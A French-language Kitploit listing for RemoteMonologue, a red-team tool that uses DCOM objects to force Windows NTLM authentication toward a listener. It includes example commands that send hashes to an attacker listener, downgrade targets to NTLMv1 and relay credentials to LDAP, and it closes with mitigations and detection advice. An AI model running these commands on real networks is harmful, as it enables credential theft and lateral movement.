Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
RemoteMonologue — Armer DCOM pour les coercitions d'authentification NTLM | Kitploit
Outils/GitHubGitHub/xforcered/remotemonologue
Attaques de Mots de PasseExploitationMouvement LatéralCollecte d'InformationsTests d'IntrusionRed Teaming
GitHubxforcered/remotemonologue

RemoteMonologue

Armer DCOM pour les coercitions d'authentification NTLM

Voir le dépôt
27522il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RemoteMonologue

RemoteMonologue est une technique de collecte d'identifiants Windows qui permet de compromettre un utilisateur à distance en exploitant la clé RunAs de l'utilisateur interactif et en forçant des authentifications NTLM via DCOM.

Lisez l'article de X-Force Red RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions pour obtenir des informations détaillées.

Fonctionnalités

🔹 Coercition d'authentification via DCOM (-dcom)

  • Cible quatre objets DCOM (ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) pour déclencher une authentification NTLM contre un écouteur spécifié (-auth-to).

🔹 Pulvérisation d'identifiants (-spray)

  • Valide les identifiants sur plusieurs systèmes tout en capturant les identifiants des utilisateurs.

🔹 Attaque de rétrogradation NetNTLMv1 (-downgrade)

  • Force les cibles à utiliser NTLMv1, rendant le cassage et le relais d'identifiants plus faciles.

🔹 Abus du service WebClient (-webclient)

  • Active le service WebClient pour faciliter la coercition d'authentification basée sur HTTP.

🔹 Énumération des utilisateurs (-query)

  • Identifie les utilisateurs ayant une session active sur le système cible.

Remarque : Des privilèges d'administrateur local sur le système cible sont requis.

Installation

root@kitploit:~
pip install impacket

Exemples

Voici un exemple d'exécution de RemoteMonologue avec l'attaque de rétrogradation NetNTLMv1 tout en utilisant Responder comme écouteur. Par défaut, si aucune option DCOM n'est spécifiée, l'outil utilise l'objet DCOM ServerDataCollectorSet.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

image

Voici un autre exemple, cette fois l'attaque est exécutée en utilisant l'objet DCOM FileSystemImage et en activant le service WebClient pour obtenir une authentification HTTP, qui est ensuite relayée vers LDAP à l'aide de ntlmrelayx.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

image

Considérations défensives

Pour se protéger contre ces techniques et les détecter, plusieurs mesures préventives et de détection peuvent être mises en œuvre.

Mesures préventives :

  1. Activer la signature LDAP et la liaison de canal : Configurez l'application de la signature LDAP et la liaison de canal sur les contrôleurs de domaine pour protéger le point de terminaison LDAP contre les attaques par relais. Remarque : Ces paramètres seront appliqués par défaut à partir de Windows Server 2025.

  2. Mettez à niveau vers les dernières versions de Windows : Mettez à niveau les serveurs vers Windows Server 2025 et les postes de travail vers Windows 11 version 24H2 pour atténuer les attaques de rétrogradation NetNTLM, car NTLMv1 a été supprimé dans ces versions.

  3. Appliquez la signature SMB : Activez et appliquez la signature SMB sur les serveurs Windows pour empêcher les attaques par relais SMB.

  4. Mettez en œuvre des politiques de mots de passe forts : Appliquez des exigences de mots de passe forts pour rendre les attaques de cassage de mots de passe plus difficiles.

Opportunités de détection :

  1. Surveillez l'accès à distance aux objets DCOM : Suivez l'accès aux objets DCOM concernés ainsi que leurs propriétés et méthodes spécifiques pour identifier une activité inhabituelle.

  2. Surveillez les modifications du registre : Surveillez les modifications des clés de registre RunAs et LmCompatibilityLevel.

  3. Suivez l'activité du service WebClient : Surveillez les cas où le service WebClient est activé à distance, car il est utilisé pour faciliter les authentifications NTLM basées sur HTTP.

Télécharger l’outil